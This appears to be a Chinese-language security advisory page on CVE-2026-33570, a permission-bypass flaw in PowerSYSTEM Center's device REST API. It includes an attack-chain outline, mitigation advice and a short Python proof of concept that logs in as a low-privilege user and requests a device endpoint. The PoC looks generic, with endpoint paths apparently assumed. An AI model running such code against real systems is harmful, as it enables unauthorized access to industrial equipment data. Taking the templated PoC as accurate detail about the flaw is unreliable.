CVE-2026-33570 CVSS 5.7 中危

CVE-2026-33570 PowerSYSTEM Center权限绕过漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33570

漏洞类型

权限绕过

CVSS评分

5.7 中危

攻击向量

邻接 (AV:A)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

PowerSYSTEM Center

漏洞概述

PowerSYSTEM Center的设备REST API端点存在安全漏洞。由于权限验证机制不完善，低权限的已认证用户可以利用该端点访问本应受操作权限限制的敏感信息。此漏洞可能导致未经授权的信息泄露，破坏系统机密性。攻击者无需用户交互，在邻接网络环境下即可发起攻击，CVSS评分为5.7。

技术细节

该漏洞源于PowerSYSTEM Center REST API中设备管理端点的访问控制逻辑缺陷。系统在处理针对特定设备信息的API请求时，未严格校验当前用户的操作权限，导致权限校验失效。具体而言，低权限用户在通过身份验证后，向受影响的REST API接口发送请求时，系统未再次检查用户是否具备查看特定敏感资源或执行特定操作的权限。这允许攻击者通过构造恶意API请求，绕过前端或业务层的权限限制，直接获取后台返回的敏感配置或状态数据。由于攻击向量为邻接网络，攻击者需具备网络访问权限及低权限账号。

攻击链分析

STEP 1

1. 信息收集

攻击者接入邻接网络，获取PowerSYSTEM Center的低权限用户账号。

STEP 2

2. 身份认证

攻击者使用低权限账号登录系统，获取有效的会话令牌或Cookie。

STEP 3

3. 漏洞利用

攻击者向存在缺陷的REST API端点发送请求，利用权限校验缺失访问受限设备信息。

STEP 4

4. 数据获取

系统返回敏感的设备配置或状态信息，攻击者完成信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_host = "https://target-ip"
api_endpoint = "/api/v1/devices"  # Vulnerable endpoint

# Low privilege credentials
creds = {
    "username": "low_user",
    "password": "user_password"
}

def exploit():
    session = requests.Session()
    
    # Step 1: Authenticate
    print("[+] Authenticating as low privilege user...")
    login = session.post(f"{target_host}/api/login", json=creds)
    
    if login.status_code != 200:
        print("[-] Login failed")
        return
    
    print("[+] Login successful. Token obtained.")
    
    # Step 2: Access restricted endpoint
    # Normally this requires admin privileges
    print(f"[+] Sending request to {api_endpoint}...")
    response = session.get(f"{target_host}{api_endpoint}")
    
    if response.status_code == 200:
        print("[+] Success! Sensitive data retrieved:")
        print(response.text)
    else:
        print("[-] Exploit failed or endpoint patched.")

if __name__ == "__main__":
    exploit()

影响范围

PowerSYSTEM Center (具体受影响版本请参考ICS-CERT公告 ICSA-26-132-02)

防御指南

临时缓解措施

在应用官方补丁之前，建议通过防火墙或网络ACL严格限制对PowerSYSTEM Center REST API接口的访问来源，仅允许必要的管理终端连接。同时，应加强系统审计，监控低权限账户是否有异常访问敏感设备信息的行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表